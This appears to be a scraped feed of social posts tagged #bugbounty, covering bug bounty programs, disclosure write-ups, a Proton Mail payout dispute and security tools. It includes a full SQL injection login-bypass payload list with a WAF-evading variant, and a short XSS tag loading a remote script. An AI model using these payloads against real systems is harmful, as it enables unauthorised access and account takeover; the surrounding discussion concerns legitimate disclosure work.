paheko, French Nous ouvrons notre programme de bug bounty pour #paheko !
Cela veut dire que si vous cherchez et trouvez des failles de sécurité dans Paheko, on peut vous récompenser. Le montant de la récompense sera fait en fonction de la sévérité de la faille. On a débloqué 1000 € pour le moment, montant amené à évoluer en fonction des retours que nous recevrons.
Un audit de sécurité partiel aura aussi lieu dans les mois qui viennent.
Pour les détails sur le bug bounty, voir ici : https://fossil.kd2.org/paheko/doc/trunk/SECURITY.md
bohwaz, French Hello les gens et les #chatons, des gens qui ont déjà mis en place un programme de #bugbounty pour un projet open source ?
La plupart des sites de bug bounty semblent conçus pour les grosses boîtes.
cyber_learning, French Avons nous, en France et en français, une plate-forme éthique de divulgation de faille cyber à but non lucratif ?
Type openbugbounty ?
Si oui, laquelle ?Le boost corrige les failles xss
ChickenPwny, #bugbounty #tooling =D it takes all the nuclei output makes it pretty now.
checkout my tool https://github.com/PolitoInc/EGOAlpha
jerry, @ChickenPwny very nice!
rwxrwx, @protonmail you paid $750 for a mail-based XSS? this is disappointing for a "service that respects privacy and puts people [...] first". https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/ #bugbounty #protonmail
protonmail, @rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.
vito, I had a field that allows html but the length is limited to 40 server side so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script> which fits in 30, and got it working nicely. #bugbounty
vito, @CenturyAvocado wow 5 letters. I tried to find one but they all seem gone now :)
CenturyAvocado, @vito "0r.lc" and some other permutations appear to still be available ;)
lirantal, ooh wow, imagemagick is the gift that keeps on giving RCE and command injection 🫣
check out this beauty of a poc
#bugbounty #infosec #cybersecurity
thijs, So somebody has reported an issue through your responsible disclosure program.
If the report is eligible for a reward, what is the preferred way of transerring the money? Is that i.e. PayPal or a different platform?
oggy, French FranceConnect #bugbounty for #hackers but not for #cybercriminals
https://yeswehack.com/programs/franceconnect-agentconnect-public
ChickenPwny, #bugbounty leaderboard
sergeant, Dutch @ChickenPwny Gay Pride?
insiderphd, If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you common see in APIs 👇👇
https://www.craft.me/s/CysIiph247P5AQ
#bugbountytips #BugBounty
_ut0p1c, @insiderphd Thanks for sharing! Last time I checked, I think it was earlier this year, OWASP was last updated in 2021is this new info?
0x58, #bugbounty hunters - Get dressed accordingly! 🐛
https://www.etsy.com/listing/1543178070/the-unstoppable-bug-bounty-hunter-t
sanjaymenon, Disposable-mailbox Docker
A self hosted yopmail like server running in a docker
https://github.com/Orange-Cyberdefense/disposable-mailbox-docker
hdm, @sanjaymenon got to love that commit message:
"removed stuff"
sanjaymenon, @hdm 😂
sanjaymenon,
tdp_org, Someone just reported that a link from our Bug Bounty Hall of Fame page goes to an unregistered profile - i.e. link destination takeover.
Beautiful. Well played. The circle is complete.
Cyberkid1987, Greek 🪲 nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications that could lead to full account takeovers
https://m.youtube.com/watch?v=ceeA3FmKxtM
by @descopeinc
nikahverse, SQL injection auth bypass list
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
revk, @nikahverse last on is cunning…
Rairii, @nikahverse for mysql and derivatives I always liked '||1-- - which tended to bypass a lot of WAFs
Edent, Found a tasty little #XSS in a new service.
Have performed a #ResponsibleDisclosure - but I doubt they offer a #BugBounty.SHA1 of the domain: 158281f1ff672afa1159fcb6788aa6825dbb0773
Edent, For those playing along at home, the answer was....
codeberg.page
https://shkspr.mobi/blog/2023/01/responsible-disclosure-xss-in-codeberg-pages/
Edent, Responsible Disclosure: Chrome security bug let tabs draw over each other ($1k bounty)
Chrome for Android had a flaw which let one tab draw over another - even if the tabs were on completely different domains. A determined attacker might have been able to abuse this to convince a user to download and installed a
#/etc/ #bug #bugbounty #google #responsibledisclosure #security
Edent, Full Disclosure: XSS in Getty Images
I've spent two months trying to report this issue to Getty images. They haven't responded to my emails, phone calls, Tweets, or LinkedIn messages. I've tried escalating through OpenBugBounty and HackerOne - but still no response. I've taken the decision to fully disclose this XSS because the Getty Images sites accept pa
https://shkspr.mobi/blog/2021/08/full-disclosure-xss-in-getty-images/
Edent, Responsible Disclosure - John Lewis
https://shkspr.mobi/blog/2020/02/responsible-disclosure-john-lewis/
Edent, Even Google forgets to renew its domains
https://shkspr.mobi/blog/2020/01/even-google-forgets-to-renew-its-domains/
sanjaymenon,
sanjaymenon,
sanjaymenon, A compiled list of companies which accept responsible disclosure